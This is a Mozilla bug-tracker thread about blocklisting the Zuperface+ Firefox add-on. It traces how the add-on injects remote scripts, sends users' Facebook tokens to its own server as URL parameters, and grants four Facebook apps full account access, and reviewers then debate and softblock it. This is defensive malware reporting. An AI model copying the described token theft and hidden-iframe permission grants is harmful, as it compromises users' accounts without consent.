Created attachment 599404 [details] 20120221 zuperface.zip User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11 Steps to reproduce: Downloaded the extension from http://www.zuperface.com/firefox.html Actual results: addon loads loads adobeflashplayer.js adobeflashplayer.js: sets/reads state from local storage sets up debugging options if it's on a facebook domain, it injects http://speed.zuperface.com/zuperface.js if it's on a google domain, it injects http://speed.zuperface.com/g.js zuperface.js: Grabs your basic details via http://graph.facebook.com/<uid>&callback=cins Injects http://speed.zuperface.com/offline.js if it's turned off, otherwise injects http://speed.zuperface.com/zaza.js; both injects pass your UID to their server as GET params Calls http://super.zuperface.com/reklam.html, which loads an image tag to http://whos.amung.us/widget/ksuw9d7f54el.png zaja.js (several versions of this, based on the value of the 'cins' GET param): cins=3 Injects a hidden iframe to http://speed.zuperface.com/letsgo.html? which includes your FB tokens for posting as GET params Make a POST to http://www.facebook.com/ajax/follow/manage_subscriptions.php, to subscribe to FB user 1520948160 cins=1 Injects a hidden iframe of http://speed.zuperface.com/tokmak.php? which includes your FB open graph token, UID, sex, and an FB application ID as GET params letsgo.html: has the following FB app IDs: ['6802152230','176901472156','291549705119','5085647995']; Creates an iframe for each app ID to http://22.214.171.124/~zuperfac/speed/sol.html? which includes your FB tokens for posting as GET params sol.html: Posts to http://www.facebook.com/connect/uiserver.php to give the passed in app ID full permissions to your Facebook account. Password on the attached zip is 'infected' Expected results: It should not steal your Facebook user information/tokens; it should not give FB applications full access to your Facebook account without your consent.
This looks like a very elaborate Facebook customization add-on. I tested for a while and didn't see any bad behavior, like pages or apps suddenly added to my account. Even if it did that, it's insufficient for blocklisting. Any privacy concerns should be voiced to the developers of this add-on, so they can fix them.
Jorge, You won't see any visible bad behavior easily with this one, aside from a new person your Facebook account is subscribed to. The only other evidence you'll see in an account is four new FB apps installed. The problem, however, is that the four FB apps it installs are given full permissions to your account. That means they can post as you, from their own servers, whenever they want. As a result, we see significant amounts of spam coming from the bad actor's infrastructure, using the compromised accounts.
The add-on itself is not malicious in nature, compromising users' security or causing major stability problems. This doesn't qualify for blocklisting.
Jorge, The add-on downloads malicious JS to get full access to a person's facebook account. That means their email address, their name, their phone number, the ability to post messages as them, to remove content as them, ... This one is more malicious than the other add-ons that were blocked in the past.
I disagree. The other add-ons you have posted have the intent to deceive users and take advantage from them. They use shady temporary domains, change their code ever so slightly and distribute over and over. This add-on looks like it has been worked on significantly, and it is actually meant to benefit users. It has the potential to access user information, but so can any add-on. Unless it is actively stealing info and you have evidence of this, I'll err on the side of caution and not blocklist an add-on that looks legitimate.
We have been given additional information about Zuperface+. It is adding apps to the Facebook accounts of its users, with full access permissions, without their consent. These apps generate spam posts. They are being disabled by Facebook, but the add-on gets new app ids dynamically, indicating malicious intent. To users of Zuperface+: while this add-on can be useful, it is using your accounts for spamming purposes. We can't allow this, so we have decided to block Zuperface+, at least until they correct their behavior.
Softblock put in place: https://addons.mozilla.org/en-US/firefox/blocked/i69